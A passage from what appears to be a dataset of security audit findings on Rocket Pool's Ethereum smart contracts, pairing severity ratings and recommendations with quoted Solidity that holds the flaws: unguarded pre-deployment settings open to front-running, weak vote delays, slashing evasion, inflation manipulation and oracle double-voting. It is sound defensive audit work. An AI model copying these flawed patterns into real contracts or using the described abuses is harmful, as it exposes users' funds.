With the default of `43204` blocks, the challenge might expire at `5 days` (10 seconds block time), `6.5 days` (13 seconds Ethereum target median block time), `7 days` (14 seconds), or more with historic block times going up to `20 seconds` for shorter periods.\\nA minority of trusted nodes may use this functionality to boot other trusted node members off the DAO issuing challenges once a day until the DAO member number is low enough to allow them to reach quorum for their own proposals or until the member threshold allows them to add new nodes without having to go through the proposal process at all.\\n```\\nsetSettingUint('members.challenge.cooldown', 6172); // How long a member must wait before performing another challenge, approx. 1 day worth of blocks\\nsetSettingUint('members.challenge.window', 43204); // How long a member has to respond to a challenge. 7 days worth of blocks\\nsetSettingUint('members.challenge.cost', 1 ether); // How much it costs a non-member to challenge a members node. It's free for current members to challenge other members.\\n```\\n\\n```\\n// In the event that the majority/all of members go offline permanently and no more proposals could be passed, a current member or a regular node can 'challenge' a DAO members node to respond\\n// If it does not respond in the given window, it can be removed as a member. The one who removes the member after the challenge isn't met, must be another node other than the proposer to provide some oversight\\n// This should only be used in an emergency situation to recover the DAO. Members that need removing when consensus is still viable, should be done via the 'kick' method.\\n```\\n","Implement the challenge-response process before enabling users to challenge other nodes. Implement means to detect misuse of this feature for griefing e.g. 
when one trusted node member forces another trusted node to defeat challenges over and over again (technical controls, monitoring).",,"```\\nsetSettingUint('members.challenge.cooldown', 6172); // How long a member must wait before performing another challenge, approx. 1 day worth of blocks\\nsetSettingUint('members.challenge.window', 43204); // How long a member has to respond to a challenge. 7 days worth of blocks\\nsetSettingUint('members.challenge.cost', 1 ether); // How much it costs a non-member to challenge a members node. It's free for current members to challenge other members.\\n```\\n" +RocketDAOProtocolSettings/RocketDAONodeTrustedSettings - anyone can set/overwrite settings until contract is declared “deployed” Acknowledged,high,"The `onlyDAOProtocolProposal` modifier guards all state-changing methods in this contract. However, analog to https://github.com/ConsenSys/rocketpool-audit-2021-03/issues/7, the access control is disabled until the variable `settingsNameSpace.deployed` is set. 
If this contract is not deployed and configured in one transaction, anyone can update the contract while left unprotected on the blockchain.\\nSee issue 6.5 for a similar issue.\\n```\\nmodifier onlyDAOProtocolProposal() {\\n // If this contract has been initialised, only allow access from the proposals contract\\n if(getBool(keccak256(abi.encodePacked(settingNameSpace, ""deployed"")))) require(getContractAddress('rocketDAOProtocolProposals') == msg.sender, ""Only DAO Protocol Proposals contract can update a setting"");\\n \\_;\\n}\\n```\\n\\n```\\nmodifier onlyDAONodeTrustedProposal() {\\n // If this contract has been initialised, only allow access from the proposals contract\\n if(getBool(keccak256(abi.encodePacked(settingNameSpace, ""deployed"")))) require(getContractAddress('rocketDAONodeTrustedProposals') == msg.sender, ""Only DAO Node Trusted Proposals contract can update a setting"");\\n \\_;\\n}\\n```\\n\\nThere are at least 9 more occurrences of this pattern.",Restrict access to the methods to a temporary trusted account (e.g. guardian) until the system bootstrapping phase ends by setting `deployed` to `true.`,,"```\\nmodifier onlyDAOProtocolProposal() {\\n // If this contract has been initialised, only allow access from the proposals contract\\n if(getBool(keccak256(abi.encodePacked(settingNameSpace, ""deployed"")))) require(getContractAddress('rocketDAOProtocolProposals') == msg.sender, ""Only DAO Protocol Proposals contract can update a setting"");\\n \\_;\\n}\\n```\\n" +RocketStorage - anyone can set/update values before the contract is initialized,high,"According to the deployment script, the contract is deployed, and settings are configured in multiple transactions. This also means that for a period of time, the contract is left unprotected on the blockchain. Anyone can delete/set any value in the centralized data store. 
An attacker might monitor the mempool for new deployments of the `RocketStorage` contract and front-run calls to `contract.storage.initialised` setting arbitrary values in the system.\\n```\\nmodifier onlyLatestRocketNetworkContract() {\\n // The owner and other contracts are only allowed to set the storage upon deployment to register the initial contracts/settings, afterwards their direct access is disabled\\n if (boolStorage[keccak256(abi.encodePacked(""contract.storage.initialised""))] == true) {\\n // Make sure the access is permitted to only contracts in our Dapp\\n require(boolStorage[keccak256(abi.encodePacked(""contract.exists"", msg.sender))], ""Invalid or outdated network contract"");\\n }\\n \\_;\\n}\\n```\\n",Restrict access to the methods to a temporary trusted account (e.g. guardian) until the system bootstrapping phase ends by setting `initialised` to `true.`,,"```\\nmodifier onlyLatestRocketNetworkContract() {\\n // The owner and other contracts are only allowed to set the storage upon deployment to register the initial contracts/settings, afterwards their direct access is disabled\\n if (boolStorage[keccak256(abi.encodePacked(""contract.storage.initialised""))] == true) {\\n // Make sure the access is permitted to only contracts in our Dapp\\n require(boolStorage[keccak256(abi.encodePacked(""contract.exists"", msg.sender))], ""Invalid or outdated network contract"");\\n }\\n \\_;\\n}\\n```\\n" +RocketDAOProposals - Unpredictable behavior due to short vote delay,high,"A proposal can be voted and passed when it enters the `ACTIVE` state. Voting starts when the current `block.number` is greater than the `startBlock` configured in the proposal (up until the endBlock). 
The requirement for the `startBlock` is to be at least greater than `block.number` when the proposal is submitted.\\n```\\nrequire(\\_startBlock > block.number, ""Proposal start block must be in the future"");\\nrequire(\\_durationBlocks > 0, ""Proposal cannot have a duration of 0 blocks"");\\nrequire(\\_expiresBlocks > 0, ""Proposal cannot have a execution expiration of 0 blocks"");\\nrequire(\\_votesRequired > 0, ""Proposal cannot have a 0 votes required to be successful"");\\n```\\n\\nThe default vote delay configured in the system is `1` block.\\n```\\nsetSettingUint('proposal.vote.delay.blocks', 1); // How long before a proposal can be voted on after it is created. Approx. Next Block\\n```\\n\\nA vote is immediately passed when the required quorum is reached which allows it to be executed. This means that a group that is holding enough voting power can propose a change, wait for two blocks (block.number (of time of proposal creation) + configuredDelay (1) + 1 (for ACTIVE state), then vote and execute for the proposal to pass for it to take effect almost immediately after only 2 blocks (<30seconds).\\nSettings can be changed after 30 seconds which might be unpredictable for other DAO members and not give them enough time to oppose and leave the DAO.","The underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change after two blocks. The only guarantee is that users can be sure the settings don't change for the next block if no proposal is active.\\nWe recommend giving the user advance notice of changes with a delay. For example, all upgrades should require two steps with a mandatory time window between them. 
The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period.",,"```\\nrequire(\\_startBlock > block.number, ""Proposal start block must be in the future"");\\nrequire(\\_durationBlocks > 0, ""Proposal cannot have a duration of 0 blocks"");\\nrequire(\\_expiresBlocks > 0, ""Proposal cannot have a execution expiration of 0 blocks"");\\nrequire(\\_votesRequired > 0, ""Proposal cannot have a 0 votes required to be successful"");\\n```\\n" +RocketNodeStaking - Node operators can reduce slashing impact by withdrawing excess staked RPL,high,"Oracle nodes update the Minipools' balance and progress it to the withdrawable state when they observe the minipools stake to become withdrawable. If the observed stakingEndBalance is less than the user deposit for that pool, the node operator is punished for the difference.\\n```\\nrocketMinipoolManager.setMinipoolWithdrawalBalances(\\_minipoolAddress, \\_stakingEndBalance, nodeAmount);\\n// Apply node penalties by liquidating RPL stake\\nif (\\_stakingEndBalance < userDepositBalance) {\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(""rocketNodeStaking""));\\n rocketNodeStaking.slashRPL(minipool.getNodeAddress(), userDepositBalance - \\_stakingEndBalance);\\n}\\n```\\n\\nThe amount slashed is at max `userDepositBalance - stakingEndBalance`. The `userDepositBalance` is at least `16 ETH` (minipool.half/.full) and at max `32 ETH` (minipool.empty). The maximum amount to be slashed is therefore `32 ETH` (endBalance = 0, minipool.empty).\\nThe slashing amount is denoted in `ETH`. 
The `RPL` price (in ETH) is updated regularly by oracle nodes (see related issue https://github.com/ConsenSys/rocketpool-audit-2021-03/issues/32; note that the `RPL` token is potentially affected by a similar issue as one can stake `RPL`, wait for the cooldown period & wait for the price to change, and withdraw stake at higher `RPL` price/ETH). The `ETH` amount to be slashed is converted to `RPL`, and the corresponding `RPL` stake is slashed.\\n```\\nuint256 rplSlashAmount = calcBase.mul(\\_ethSlashAmount).div(rocketNetworkPrices.getRPLPrice());\\n// Cap slashed amount to node's RPL stake\\nuint256 rplStake = getNodeRPLStake(\\_nodeAddress);\\nif (rplSlashAmount > rplStake) { rplSlashAmount = rplStake; }\\n// Transfer slashed amount to auction contract\\nrocketVault.transferToken(""rocketAuctionManager"", getContractAddress(""rocketTokenRPL""), rplSlashAmount);\\n// Update RPL stake amounts\\ndecreaseTotalRPLStake(rplSlashAmount);\\ndecreaseNodeRPLStake(\\_nodeAddress, rplSlashAmount);\\n```\\n\\nIf the node does not have a sufficient `RPL` stake to cover the losses, the slashing amount is capped at whatever amount of `RPL` the node has left staked.\\nThe minimum amount of `RPL` a node needs to have staked if it operates minipools is calculated as follows:\\n```\\n // Calculate minimum RPL stake\\n return rocketDAOProtocolSettingsMinipool.getHalfDepositUserAmount()\\n .mul(rocketDAOProtocolSettingsNode.getMinimumPerMinipoolStake())\\n .mul(rocketMinipoolManager.getNodeMinipoolCount(\\_nodeAddress))\\n .div(rocketNetworkPrices.getRPLPrice());\\n}\\n```\\n\\nWith the current configuration, this would resolve in a minimum stake of `16 ETH * 0.1 (10% collateralization) * 1 (nr_minipools) * RPL_Price` for a node operating 1 minipool. 
This means a node operator basically only needs to have 10% of `16 ETH` staked to operate one minipool.\\nAn operator can withdraw their stake at any time, but they have to wait at least 14 days after the last time they staked (cooldown period). They can, at max, withdraw all but the minimum stake required to run the pools (nr_of_minipools * 16 ETH * 10%). This also means that after the cooldown period, they can reduce their stake to 10% of the half deposit amount (16ETH), then perform a voluntary exit on ETH2 so that the minipool becomes `withdrawable`. If they end up with less than the `userDepositBalance` in staking rewards, they would only get slashed the `1.6 ETH` at max (10% of 16ETH half deposit amount for 1 minipool) even though they incurred a loss that may be up to 32 ETH (empty Minipool empty amount).\\nFurthermore, if a node operator runs multiple minipools, let's say 5, then they would have to provide at least `5*16ETH*0.1 = 8ETH` as a security guarantee in the form of staked RPL. If the node operator incurs a loss with one of their minipools, their 8 ETH RPL stake will likely be slashed in full. Their other - still operating - minipools are not backed by any RPL anymore, and they effectively cannot be slashed anymore. This means that a malicious node operator can create multiple minipools, stake the minimum amount of RPL, get slashed for one minipool, and still operate the others without having the minimum RPL needed to run the minipools staked (getNodeMinipoolLimit).\\nThe RPL stake is donated to the RocketAuctionManager, where they can attempt to buy back RPL potentially at a discount.\\nNote: Staking more RPL (e.g., to add another Minipool) resets the cooldown period for the total RPL staked (not only for the newly added)","It is recommended to redesign the withdrawal process to prevent users from withdrawing their stake while slashable actions can still occur. A potential solution may be to add a locking period in the process. 
A node operator may schedule the withdrawal of funds, and after a certain time has passed, may withdraw them. This prevents the immediate withdrawal of funds that may need to be reduced while slashable events can still occur. E.g.:\\nA node operator requests to withdraw all but the minimum required stake to run their pools.\\nThe funds are scheduled for withdrawal and locked until a period of X days has passed.\\n(optional) In this period, a slashable event occurs. The funds for compensation are taken from the user's stake including the funds scheduled for withdrawal.\\nAfter the time has passed, the node operator may call a function to trigger the withdrawal and get paid out.",,"```\\nrocketMinipoolManager.setMinipoolWithdrawalBalances(\\_minipoolAddress, \\_stakingEndBalance, nodeAmount);\\n// Apply node penalties by liquidating RPL stake\\nif (\\_stakingEndBalance < userDepositBalance) {\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(""rocketNodeStaking""));\\n rocketNodeStaking.slashRPL(minipool.getNodeAddress(), userDepositBalance - \\_stakingEndBalance);\\n}\\n```\\n" +RocketTokenRPL - inaccurate inflation rate and potential for manipulation lowering the real APY,high,"RocketTokenRPL allows users to swap their fixed-rate tokens to the inflationary RocketTokenRPL ERC20 token via a `swapToken` function. The DAO defines the inflation rate of this token and is initially set to be 5% APY. This APY is configured as a daily inflation rate (APD) with the corresponding `1 day in blocks` inflation interval in the `rocketDAOProtocolSettingsInflation` contract. The DAO members control the inflation settings.\\nAnyone can call `inflationMintTokens` to inflate the token, which mints tokens to the contracts RocketVault. Tokens are minted for discreet intervals since the last time `inflationMintTokens` was called (recorded as inflationCalcBlock). 
The inflation is then calculated for the passed intervals without taking the current not yet completed interval. However, the `inflationCalcBlock` is set to the current `block.number`, effectively skipping some “time”/blocks of the APY calculation.\\nThe more often `inflationMintTokens` is called, the higher the APY likelihood dropping below the configured 5%. In the worst case, one could manipulate the APY down to 2.45% (assuming that the APD for a 5% APY was configured) by calling `inflationMintTokens` close to the end of every second interval. This would essentially restart the APY interval at `block.number`, skipping blocks of the current interval that have not been accounted for.\\nThe following diagram illustrates the skipped blocks due to the incorrect recording of `inflationCalcBlock` as `block.number`. The example assumes that we are in interval 4 but have not completed it. `3` APD intervals have passed, and this is what the inflation rate is based on. However, the `inflationCalcBlock` is updated to the current `block.number`, skipping some time/blocks that are now unaccounted in the APY restarting the 4th interval at `block.number`.\\n\\nNote: updating the inflation rate will directly affect past inflation intervals that have not been minted! this might be undesirable, and it could be considered to force an inflation mint if the APY changes\\nNote: if the interval is small enough and there is a history of unaccounted intervals to be minted, and the Ethereum network is congested, gas fees may be high and block limits hit, the calculations in the for loop might be susceptible to DoS the inflation mechanism because of gas constraints.\\nNote: The inflation seems only to be triggered regularly on `RocketRewardsPool.claim` (or at any point by external actors). 
If the price establishes based on the total supply of tokens, then this may give attackers an opportunity to front-run other users trading large amounts of RPL that may previously have calculated their prices based on the un-inflated supply.\\nNote: that the discrete interval-based inflation (e.g., once a day) might create dynamics that put pressure on users to trade their RPL in windows instead of consecutively\\nthe inflation intervals passed is the number of completed intervals. The current interval that is started is not included.\\n```\\nfunction getInlfationIntervalsPassed() override public view returns(uint256) {\\n // The block that inflation was last calculated at\\n uint256 inflationLastCalculatedBlock = getInflationCalcBlock();\\n // Get the daily inflation in blocks\\n uint256 inflationInterval = getInflationIntervalBlocks();\\n // Calculate now if inflation has begun\\n if(inflationLastCalculatedBlock > 0) {\\n return (block.number).sub(inflationLastCalculatedBlock).div(inflationInterval);\\n }else{\\n return 0;\\n }\\n}\\n```\\n\\nthe inflation calculation calculates the to-be-minted tokens for the inflation rate at `newTokens = supply * rateAPD^intervals - supply`\\n```\\nfunction inflationCalculate() override public view returns (uint256) {\\n // The inflation amount\\n uint256 inflationTokenAmount = 0;\\n // Optimisation\\n uint256 inflationRate = getInflationIntervalRate();\\n // Compute the number of inflation intervals elapsed since the last time we minted infation tokens\\n uint256 intervalsSinceLastMint = getInlfationIntervalsPassed();\\n // Only update if last interval has passed and inflation rate is > 0\\n if(intervalsSinceLastMint > 0 && inflationRate > 0) {\\n // Our inflation rate\\n uint256 rate = inflationRate;\\n // Compute inflation for total inflation intervals elapsed\\n for (uint256 i = 1; i < intervalsSinceLastMint; i++) {\\n rate = rate.mul(inflationRate).div(10 \\*\\* 18);\\n }\\n // Get the total supply now\\n uint256 
totalSupplyCurrent = totalSupply();\\n // Return inflation amount\\n inflationTokenAmount = totalSupplyCurrent.mul(rate).div(10 \\*\\* 18).sub(totalSupplyCurrent);\\n }\\n // Done\\n return inflationTokenAmount;\\n}\\n```\\n","Properly track `inflationCalcBlock` as the end of the previous interval, as this is up to where the inflation was calculated, instead of the block at which the method was invoked.\\nEnsure APY/APD and interval configuration match up. Ensure the interval is not too small (potential gas DoS blocking inflation mint and RocketRewardsPool.claim).",,```\\nfunction getInlfationIntervalsPassed() override public view returns(uint256) {\\n // The block that inflation was last calculated at\\n uint256 inflationLastCalculatedBlock = getInflationCalcBlock();\\n // Get the daily inflation in blocks\\n uint256 inflationInterval = getInflationIntervalBlocks();\\n // Calculate now if inflation has begun\\n if(inflationLastCalculatedBlock > 0) {\\n return (block.number).sub(inflationLastCalculatedBlock).div(inflationInterval);\\n }else{\\n return 0;\\n }\\n}\\n```\\n +RocketDAONodeTrustedUpgrade - upgrade does not prevent the use of the same address multiple times creating an inconsistency where getContractAddress returns outdated information,high,"When adding a new contract, it is checked whether the address is already in use. This check is missing when upgrading a named contract to a new implementation, potentially allowing someone to register one address to multiple names creating an inconsistent configuration.\\nThe crux of this is, that, `getContractAddress()` will now return a contract address that is not registered anymore (while `getContractName` may throw). 
`getContractAddress` can therefore not relied upon when checking ACL.\\nadd contract `name=test, address=0xfefe` ->\\n```\\n sets contract.exists.0xfefe=true\\n sets contract.name.0xfefe=test\\n sets contract.address.test=0xfefe\\n sets contract.abi.test=abi\\n```\\n\\nadd another contract `name=badcontract, address=0xbadbad` ->\\n```\\nsets contract.exists.0xbadbad=true\\nsets contract.name.0xbadbad=badcontract\\nsets contract.address.badcontract=0xbadbad\\nsets contract.abi.badcontract=abi\\n```\\n\\nupdate contract `name=test, address=0xbadbad` reusing badcontradcts address, the address is now bound to 2 names (test, badcontract)\\n```\\noverwrites contract.exists.0xbadbad=true` (even though its already true)\\nupdates contract.name.0xbadbad=test (overwrites the reference to badcontract; badcontracts config is now inconsistent)\\nupdates contract.address.test=0xbadbad (ok, expected)\\nupdates contract.abi.test=abi (ok, expected)\\nremoves contract.name.0xfefe (ok)\\nremoves contract.exists.0xfefe (ok)\\n```\\n\\nupdate contract `name=test, address=0xc0c0`\\n```\\nsets contract.exists.0xc0c0=true\\nsets contract.name.0xc0c0=test (ok, expected)\\nupdates contract.address.test=0xc0c0 (ok, expected)\\nupdates contract.abi.test=abi (ok, expected)\\nremoves contract.name.0xbadbad (the contract is still registered as badcontract, but is indirectly removed now)\\nremoves contract.exists.0xbadbad (the contract is still registered as badcontract, but is indirectly removed now)\\n```\\n\\nAfter this, `badcontract` is partially cleared, `getContractName(0xbadbad)` throws while `getContractAddress(badcontract)` returns `0xbadbad` which is already unregistered (contract.exists.0xbadbad=false)\\n```\\n(removed) contract.exists.0xbadbad\\n(removed) contract.name.0xbadbad=badcontract\\nsets contract.address.badcontract=0xbadbad\\nsets contract.abi.badcontract=abi\\n```\\n\\ncheck in `_addContract``\\n```\\nrequire(\\_contractAddress != address(0x0), ""Invalid contract 
address"");\\n```\\n\\nno checks in `upgrade.`\\n```\\nrequire(\\_contractAddress != address(0x0), ""Invalid contract address"");\\nrequire(\\_contractAddress != oldContractAddress, ""The contract address cannot be set to its current address"");\\n// Register new contract\\nsetBool(keccak256(abi.encodePacked(""contract.exists"", \\_contractAddress)), true);\\nsetString(keccak256(abi.encodePacked(""contract.name"", \\_contractAddress)), \\_name);\\nsetAddress(keccak256(abi.encodePacked(""contract.address"", \\_name)), \\_contractAddress);\\nsetString(keccak256(abi.encodePacked(""contract.abi"", \\_name)), \\_contractAbi);\\n```\\n",Resolution\\nA check has been introduced to make sure that the new contract address is not already in use by checking against the corresponding `contract.exists` storage key.\\nCheck that the address being upgraded to is not yet registered and properly clean up `contract.address.`.,,```\\n sets contract.exists.0xfefe=true\\n sets contract.name.0xfefe=test\\n sets contract.address.test=0xfefe\\n sets contract.abi.test=abi\\n```\\n +RocketStorage - Risk concentration by giving all registered contracts permissions to change any settings in RocketStorage Acknowledged,high,"The ACL for changing settings in the centralized `RocketStorage` allows any registered contract (listed under contract.exists) to change settings that belong to other parts of the system.\\nThe concern is that if someone finds a way to add their malicious contract to the registered contact list, they will override any setting in the system. The storage is authoritative when checking certain ACLs. Being able to set any value might allow an attacker to gain control of the complete system. 
Allowing any contract to overwrite other contracts' settings dramatically increases the attack surface.\\n```\\nmodifier onlyLatestRocketNetworkContract() {\\n // The owner and other contracts are only allowed to set the storage upon deployment to register the initial contracts/settings, afterwards their direct access is disabled\\n if (boolStorage[keccak256(abi.encodePacked(""contract.storage.initialised""))] == true) {\\n // Make sure the access is permitted to only contracts in our Dapp\\n require(boolStorage[keccak256(abi.encodePacked(""contract.exists"", msg.sender))], ""Invalid or outdated network contract"");\\n }\\n \\_;\\n}\\n```\\n\\n```\\nfunction setAddress(bytes32 \\_key, address \\_value) onlyLatestRocketNetworkContract override external {\\n addressStorage[\\_key] = \\_value;\\n}\\n\\n/// @param \\_key The key for the record\\nfunction setUint(bytes32 \\_key, uint \\_value) onlyLatestRocketNetworkContract override external {\\n uIntStorage[\\_key] = \\_value;\\n}\\n```\\n","Resolution\\nThe client provided the following statement:\\nWe've looked at adding access control contracts using namespaces, but the increase in gas usage would be significant and could hinder upgrades.\\nAllow contracts to only change settings related to their namespace.",,"```\\nmodifier onlyLatestRocketNetworkContract() {\\n // The owner and other contracts are only allowed to set the storage upon deployment to register the initial contracts/settings, afterwards their direct access is disabled\\n if (boolStorage[keccak256(abi.encodePacked(""contract.storage.initialised""))] == true) {\\n // Make sure the access is permitted to only contracts in our Dapp\\n require(boolStorage[keccak256(abi.encodePacked(""contract.exists"", msg.sender))], ""Invalid or outdated network contract"");\\n }\\n \\_;\\n}\\n```\\n" +RocketDAOProposals - require a minimum participation quorum for DAO proposals,medium,"If the DAO falls below the minimum viable membership threshold, voting for proposals 
still continues as DAO proposals do not require a minimum participation quorum. In the worst case, this would allow the last standing DAO member to create a proposal that would be passable with only one vote even if new members would be immediately ready to join via the recovery mode (which has its own risks) as the minimum votes requirement for proposals is set as `>0`.\\n```\\nrequire(\\_votesRequired > 0, ""Proposal cannot have a 0 votes required to be successful"");\\n```\\n\\n```\\nfunction propose(string memory \\_proposalMessage, bytes memory \\_payload) override public onlyTrustedNode(msg.sender) onlyLatestContract(""rocketDAONodeTrustedProposals"", address(this)) returns (uint256) {\\n // Load contracts\\n RocketDAOProposalInterface daoProposal = RocketDAOProposalInterface(getContractAddress('rocketDAOProposal'));\\n RocketDAONodeTrustedInterface daoNodeTrusted = RocketDAONodeTrustedInterface(getContractAddress('rocketDAONodeTrusted'));\\n RocketDAONodeTrustedSettingsProposalsInterface rocketDAONodeTrustedSettingsProposals = RocketDAONodeTrustedSettingsProposalsInterface(getContractAddress(""rocketDAONodeTrustedSettingsProposals""));\\n // Check this user can make a proposal now\\n require(daoNodeTrusted.getMemberLastProposalBlock(msg.sender).add(rocketDAONodeTrustedSettingsProposals.getCooldown()) <= block.number, ""Member has not waited long enough to make another proposal"");\\n // Record the last time this user made a proposal\\n setUint(keccak256(abi.encodePacked(daoNameSpace, ""member.proposal.lastblock"", msg.sender)), block.number);\\n // Create the proposal\\n return daoProposal.add(msg.sender, 'rocketDAONodeTrustedProposals', \\_proposalMessage, block.number.add(rocketDAONodeTrustedSettingsProposals.getVoteDelayBlocks()), rocketDAONodeTrustedSettingsProposals.getVoteBlocks(), rocketDAONodeTrustedSettingsProposals.getExecuteBlocks(), daoNodeTrusted.getMemberQuorumVotesRequired(), \\_payload);\\n}\\n```\\n\\nSidenote: Since a proposals acceptance 
quorum is recorded on proposal creation, this may lead to another scenario where proposals acceptance quorum may never be reached if members leave the DAO. This would require a re-submission of the proposal.",Do not accept proposals if the member count falls below the minimum DAO membercount threshold.,,"```\\nrequire(\\_votesRequired > 0, ""Proposal cannot have a 0 votes required to be successful"");\\n```\\n" +RocketDAONodeTrustedUpgrade - inconsistent upgrade blacklist,medium,"`upgradeContract` defines a hardcoded list of contracts that cannot be upgraded because they manage their own settings (statevars) or they hold value in the system.\\nthe list is hardcoded and cannot be extended when new contracts are added via `addcontract`. E.g. what if another contract holding value is added to the system? This would require an upgrade of the upgrade contract to update the whitelist (gas hungry, significant risk of losing access to the upgrade mechanisms if a bug is being introduced).\\na contract named `rocketPoolToken` is blacklisted from being upgradeable but the system registers no contract called `rocketPoolToken`. This may be an oversight or artifact of a previous iteration of the code. However, it may allow a malicious group of nodes to add a contract that is not yet in the system which cannot be removed anymore as there is no `removeContract` functionality and `upgradeContract` to override the malicious contract will fail due to the blacklist.\\nNote that upgrading `RocketTokenRPL` requires an account balance migration as contracts in the system may hold value in `RPL` (e.g. a lot in AuctionManager) that may vanish after an upgrade. The contract is not exempt from upgrading. A migration may not be easy to perform as the system cannot be paused to e.g. 
snapshot balances.\\n```\\nfunction \\_upgradeContract(string memory \\_name, address \\_contractAddress, string memory \\_contractAbi) internal {\\n // Check contract being upgraded\\n bytes32 nameHash = keccak256(abi.encodePacked(\\_name));\\n require(nameHash != keccak256(abi.encodePacked(""rocketVault"")), ""Cannot upgrade the vault"");\\n require(nameHash != keccak256(abi.encodePacked(""rocketPoolToken"")), ""Cannot upgrade token contracts"");\\n require(nameHash != keccak256(abi.encodePacked(""rocketTokenRETH"")), ""Cannot upgrade token contracts"");\\n require(nameHash != keccak256(abi.encodePacked(""rocketTokenNETH"")), ""Cannot upgrade token contracts"");\\n require(nameHash != keccak256(abi.encodePacked(""casperDeposit"")), ""Cannot upgrade the casper deposit contract"");\\n // Get old contract address & check contract exists\\n```\\n",Consider implementing a whitelist of contracts that are allowed to be upgraded instead of a more error-prone blacklist of contracts that cannot be upgraded.\\nProvide documentation that outlines what contracts are upgradeable and why.\\nCreate a process to verify the blacklist before deploying/operating the system.\\nPlan for migration paths when upgrading contracts in the system\\nAny proposal that reaches the upgrade contract must be scrutinized for potential malicious activity (e.g. as any registered contract can directly modify storage or may contain subtle backdoors. 
Upgrading without performing a thorough security inspection may easily put the DAO at risk),,"```\\nfunction \\_upgradeContract(string memory \\_name, address \\_contractAddress, string memory \\_contractAbi) internal {\\n // Check contract being upgraded\\n bytes32 nameHash = keccak256(abi.encodePacked(\\_name));\\n require(nameHash != keccak256(abi.encodePacked(""rocketVault"")), ""Cannot upgrade the vault"");\\n require(nameHash != keccak256(abi.encodePacked(""rocketPoolToken"")), ""Cannot upgrade token contracts"");\\n require(nameHash != keccak256(abi.encodePacked(""rocketTokenRETH"")), ""Cannot upgrade token contracts"");\\n require(nameHash != keccak256(abi.encodePacked(""rocketTokenNETH"")), ""Cannot upgrade token contracts"");\\n require(nameHash != keccak256(abi.encodePacked(""casperDeposit"")), ""Cannot upgrade the casper deposit contract"");\\n // Get old contract address & check contract exists\\n```\\n" +RocketMinipoolStatus - DAO Membership changes can result in votes getting stuck,medium,"Changes in the DAO's trusted node members are reflected in the `RocketDAONodeTrusted.getMemberCount()` function. When compared with the vote on consensus threshold, a DAO-driven decision is made, e.g., when updating token price feeds and changing Minipool states.\\nEspecially in the early phase of the DAO, the functions below can get stuck as execution is restricted to DAO members who have not voted yet. Consider the following scenario:\\nThe DAO consists of five members\\nTwo members vote to make a Minipool withdrawable\\nThe other three members are inactive, the community votes, and they get kicked from the DAO\\nThe two remaining members have no way to change the Minipool state now. 
All method calls to trigger the state update fail because the members have already voted before.\nNote: votes of members that are kicked/leave are still counted towards the quorum!\nSetting a Minipool into the withdrawable state:\n```\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\n    setMinipoolWithdrawable(\_minipoolAddress, \_stakingStartBalance, \_stakingEndBalance);\n}\n```\n\nSubmitting a block's network balances:\n```\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\n    updateBalances(\_block, \_totalEth, \_stakingEth, \_rethSupply);\n}\n```\n\nSubmitting a block's RPL price information:\n```\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\n    updatePrices(\_block, \_rplPrice);\n}\n```\n
In case the DAO gets into the scenario above, anyone can call the function to trigger a reevaluation of the condition with updated membership numbers and thus get the process unstuck.",,"```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n setMinipoolWithdrawable(\\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance);\\n}\\n```\\n" +Trusted/Oracle-Nodes can vote multiple times for different outcomes,medium,"Trusted/oracle nodes submit various ETH2 observations to the RocketPool contracts. When 51% of nodes submitted the same observation, the result is stored in the contract. However, while it is recorded that a node already voted for a specific minipool (being withdrawable & balance) or block (price/balance), a re-submission with different parameters for the same minipool/block is not rejected.\\nSince the oracle values should be distinct, clear, and there can only be one valid value, it should not be allowed for trusted nodes to change their mind voting for multiple different outcomes within one block or one minipool\\n`RocketMinipoolStatus` - a trusted node can submit multiple different results for one minipool\\nNote that `setBool(keccak256(abi.encodePacked(""minipool.withdrawable.submitted.node"", msg.sender, _minipoolAddress)), true);` is recorded but never checked. 
(as for the other two instances)\\n```\\n// Get submission keys\\nbytes32 nodeSubmissionKey = keccak256(abi.encodePacked(""minipool.withdrawable.submitted.node"", msg.sender, \\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance));\\nbytes32 submissionCountKey = keccak256(abi.encodePacked(""minipool.withdrawable.submitted.count"", \\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance));\\n// Check & update node submission status\\nrequire(!getBool(nodeSubmissionKey), ""Duplicate submission from node"");\\nsetBool(nodeSubmissionKey, true);\\nsetBool(keccak256(abi.encodePacked(""minipool.withdrawable.submitted.node"", msg.sender, \\_minipoolAddress)), true);\\n// Increment submission count\\nuint256 submissionCount = getUint(submissionCountKey).add(1);\\nsetUint(submissionCountKey, submissionCount);\\n```\\n\\n`RocketNetworkBalances` - a trusted node can submit multiple different results for the balances at a specific block\\n```\\n// Get submission keys\\nbytes32 nodeSubmissionKey = keccak256(abi.encodePacked(""network.balances.submitted.node"", msg.sender, \\_block, \\_totalEth, \\_stakingEth, \\_rethSupply));\\nbytes32 submissionCountKey = keccak256(abi.encodePacked(""network.balances.submitted.count"", \\_block, \\_totalEth, \\_stakingEth, \\_rethSupply));\\n// Check & update node submission status\\nrequire(!getBool(nodeSubmissionKey), ""Duplicate submission from node"");\\nsetBool(nodeSubmissionKey, 